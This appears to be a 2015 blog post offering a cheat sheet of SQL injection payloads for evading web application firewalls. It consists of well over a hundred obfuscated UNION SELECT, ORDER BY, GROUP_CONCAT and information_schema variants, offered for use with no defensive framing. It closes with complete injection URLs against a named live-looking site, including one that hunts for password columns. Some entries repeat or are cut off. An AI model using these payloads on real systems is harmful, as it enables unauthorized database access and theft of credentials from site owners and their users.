Saturday, April 25, 2015

Bypassing Cheat Sheet of All WAFs



Cheat Sheet of UNION SELECT:
This is the list of UNION SELECT bypasses:
----------------------------------------------------------------------------------------------------------------
  1. +union+distinct+select+
  2. +union+distinctROW+select+
  3. /**//*!12345UNION SELECT*//**/
  4. /**//*!50000UNION SELECT*//**/
  5. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  6. +/*!u%6eion*/+/*!se%6cect*/+
  7. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  8. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  9. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  10. union /*!50000%53elect*/
  11. %55nion %53elect
  12. +--+Union+--+Select+--+
  13. +UnIoN/*&a=*/SeLeCT/*&a=*/
  14. id=1+?UnI?On?+'SeL?ECT?
  15. id=1+'UnI'||'on'+SeLeCT'
  16. UnIoN SeLeCt CoNcAt(version())--
  17. uNiOn aLl sElEcT
  18. uUNIONnion all sSELECTelect 
  19. /*union*/union/*select*/select+1,2,3/*
  20. /*uniXon*/union/*selXect*/select+1,2/*
  21. un/**/ion+sel/**/ect
  22. +#1q%0Aunion all#qa%0A#%0Aselect
  23. union /*!select*/+
  24. union/**/select/**/
  25. /**/union/**/select/**/
  26. /**/union/*!50000select*/
  27. /**//*!12345UNION SELECT*//**/
  28. /**//*!50000UNION SELECT*//**/
  29. /**/uniUNIONon/**/selSELECTect/**/
  30. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  31. /**//*!union*//**//*!select*//**/
  32. /**/UNunionION/**/SELselectECT/**/
  33. /**//*UnIOn*//**//*SEleCt*//**/
  34. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  35. /**/UNunionION/**/all/**/SELselectECT/**/
  36. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  37. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  38. uni
  39. %20union%20/*!select*/%20
  40. union%23aa%0Aselect
  41. union+distinct+select+
  42. union+distinctROW+select+
  43. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  44. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  45. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  46. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  47. /*!u%6eion*/+/*!se%6cect*/+
  48. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  49. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  50. union /*!50000%53elect*/
  51. +%2F**/+Union/*!select*/
  52. %55nion %53elect
  53. +?+Union+?+Select+?+
  54. +UnIoN/*&a=*/SeLeCT/*&a=*/
  55. uNiOn aLl sElEcT
  56. uUNIONnion all sSELECTelect
  57. union(select(1),2,3)
  58. union (select 1111,2222,3333)
  59. union (/*!/**/ SeleCT */ 11)
  60. %0A%09UNION%0CSELECT%10NULL%
  61. /*!union*//*?*//*!all*//*?*//*!select*/
  62. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  63. union+sel%0bect
  64. +uni*on+sel*ect+
  65. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  66. union(select (1),(2),(3),(4),(5))
  67. UNION(SELECT(column)FROM(table))
  68. id=1+?UnI?On?+?SeL?ECT?
  69. id=1+?UnI?||?on?+SeLeCT?
  70. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  71. /*!00000Union*/ /*!00000Select*/
  72. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  73. %55nion %53elect
  74. %55nion(%53elect 1,2,3)-- -
  75. +union+distinct+select+
  76. +union+distinctROW+select+
  77. /**//*!12345UNION SELECT*//**/
  78. /**//*!50000UNION SELECT*//**/
  79. /**/UNION/**//*!50000SELECT*//**/
  80. /*!50000UniON SeLeCt*/
  81. union /*!50000%53elect*/
  82. + #?uNiOn + #?sEleCt
  83. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  84. /*!%55NiOn*/ /*!%53eLEct*/
  85. /*!u%6eion*/ /*!se%6cect*/
  86. +un/**/ion+se/**/lect
  87. uni%0bon+se%0blect
  88. %2f**%2funion%2f**%2fselect
  89. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  90. REVERSE(noinu)+REVERSE(tceles)
  91. /*--*/union/*--*/select/*--*/
  92. union (/*!/**/ SeleCT */ 1,2,3)
  93. /*!union*/+/*!select*/
  94. union+/*!select*/
  95. /**/union/**/select/**/
  96. /**/uNIon/**/sEleCt/**/
  97. +%2F**/+Union/*!select*/
  98. /**//*!union*//**//*!select*//**/
  99. /*!uNIOn*/ /*!SelECt*/
  100. +union+distinct+select+
  101. +union+distinctROW+select+
  102. uNiOn aLl sElEcT
  103. UNIunionON+SELselectECT
  104. /**/union/*!50000select*//**/
  105. 0%a0union%a0select%09
  106. %0Aunion%0Aselect%0A
  107. %55nion/**/%53elect
  108. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  109. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  110. %0A%09UNION%0CSELECT%10NULL%
  111. /*!union*//*--*//*!all*//*--*//*!select*/
  112. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  113. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  114. +UnIoN/*&a=*/SeLeCT/*&a=*/
  115. union+sel%0bect
  116. +uni*on+sel*ect+
  117. +#1q%0Aunion all#qa%0A#%0Aselect
  118. union(select (1),(2),(3),(4),(5))
  119. UNION(SELECT(column)FROM(table))
  120. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  121. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  122. union(select(1),2,3)
  123. union (select 1111,2222,3333)
  124. uNioN (/*!/**/ SeleCT */ 11)
  125. union (select 1111,2222,3333)
  126. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  127. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  128. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  129. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  130. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  131. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  132. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  133. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  134. /union\sselect/g
  135. /union\s+select/i
  136. /*!UnIoN*/SeLeCT
  137. +UnIoN/*&a=*/SeLeCT/*&a=*/
  138. +uni>on+sel>ect+
  139. +(UnIoN)+(SelECT)+
  140. +(UnI)(oN)+(SeL)(EcT)
  141. +?UnI?On?+'SeL?ECT?
  142. +uni on+sel ect+
  143. +/*!UnIoN*/+/*!SeLeCt*/+
  144. /*!u%6eion*/ /*!se%6cect*/
  145. uni%20union%20/*!select*/%20
  146. union%23aa%0Aselect
  147. /**/union/*!50000select*/
  148. /^.*union.*$/ /^.*select.*$/
  149. /*union*/union/*select*/select+
  150. /*uni X on*/union/*sel X ect*/
  151. +un/**/ion+sel/**/ect+
  152. +UnIOn%0d%0aSeleCt%0d%0a
  153. UNION/*&test=1*/SELECT/*&pwn=2*/
  154. un?+un/**/ion+se/**/lect+
  155. +UNunionION+SEselectLECT+
  156. +uni%0bon+se%0blect+
  157. %252f%252a*/union%252f%252a /select%252f%252a*/
  158. /%2A%2A/union/%2A%2A/select/%2A%2A/
  159. %2f**%2funion%2f**%2fselect%2f**%2f
  160. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  161. /*!UnIoN*/SeLecT+
-----------------------------------------------------------------------------------------------------------------------
UNION SELECT bypass with the URL-encoded method:
-----------------------------------------------------------------------------------------------------------------------
  1. %55nion(%53elect)
  2. union%20distinct%20select
  3. union%20%64istinctRO%57%20select
  4. union%2053elect
  5. %23?%0auion%20?%23?%0aselect
  6. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  7. %55nion %53eLEct
  8. u%6eion se%6cect
  9. unio%6e %73elect
  10. unio%6e%20%64istinc%74%20%73elect
  11. uni%6fn distinct%52OW s%65lect
  12. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

---------------------------------------------------------------------------------------------------------------------
Cheat Sheet for Bypassing ORDER BY and GROUP BY
---------------------------------------------------------------------------------------------------------------------

  1.  order by/**_**/
  2. /*!12345order*/ /*!12345by*/
  3. ) order by 1-- -
  4. ') order by 1-- -

  5. ')order by 1%23%23

  6. %')order by 1%23%23

  7. Null' order by 100--+

  8. Null' order by 9999--+

  9. ')group by 99-- -

  10. 'group by 119449-- -

  11. 'group/**/by/**/99%23%23
------------------------------------------------------------------------------------------------------------------------
Concat and GROUP_CONCAT Bypass Cheat Sheet:
------------------------------------------------------------------------------------------------------------------------


  1. /*!12345group_concat*/(/*!12345table_name*/)
  2. /*!50000group_concat*/(/*!50000table_name*/)
  3. /*!GrOuP_ConCaT*/()
  4. /*!12345GroUP_ConCat*/()
  5. /*!50000gRouP_cOnCaT*/()
  6. /*!50000Gr%6fuP_c%6fnCAT*/()
  7. /*!group_concat*/()
  8. gRoUp_cOnCAt()
  9. group_concat(/*!*/)
  10. group_concat(/*!12345table_name*/)
  11. group_concat(/*!50000table_name*/)
  12. /*!group_concat*/(/*!12345table_name*/)
  13. /*!group_concat*/(/*!50000table_name*/)
  14. unhex(hex(group_concat(table_name)))
  15. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  16. unhex(hex(/*!12345group_concat*/(table_name)))
  17. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  18. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  19. unhex(hex(/*!50000group_concat*/(table_name)))
  20. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  21. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  22. CONVERT(group_concat(table_name)+USING+latin1)
  23. CONVERT(group_concat(table_name)+USING+latin2)
  24. CONVERT(group_concat(table_name)+USING+latin3)
  25. CONVERT(group_concat(table_name)+USING+latin4)
  26. CONVERT(group_concat(table_name)+USING+latin5)
  27. convert(group_concat(table_name)+using+ascii)
  28. convert(group_concat(/*!table_name*/)+using+ascii)
  29. convert(group_concat(/*!12345table_name*/)+using+ascii)
  30. convert(group_concat(/*!50000table_name*/)+using+ascii)
  31. /*!concat_ws(0x3a,)*/
  32. concat_ws(0x3a3a3a,version()
  33. CONCAT_WS(CHAR(32,58,32),version(),)
----------------------------------------------------------------------------------------------------------------
How to Bypass Tables:
---------------------------------------------------------------------------------------------------------------
group_concat(/*!table_name*/)

  1. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -

  2. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()? 
  3. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
===========================================================
How to Bypass Columns:
===========================================================
  1. group_concat(/*!column_name*/)
  2. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  3. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -


========================================================================
URL-Encoded Bypassing of Tables and Columns:
===========================================================

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
For example:
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?

========================================================================
Illegal Mix of Collations Bypass:
========================================================================
Bypass method:

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?
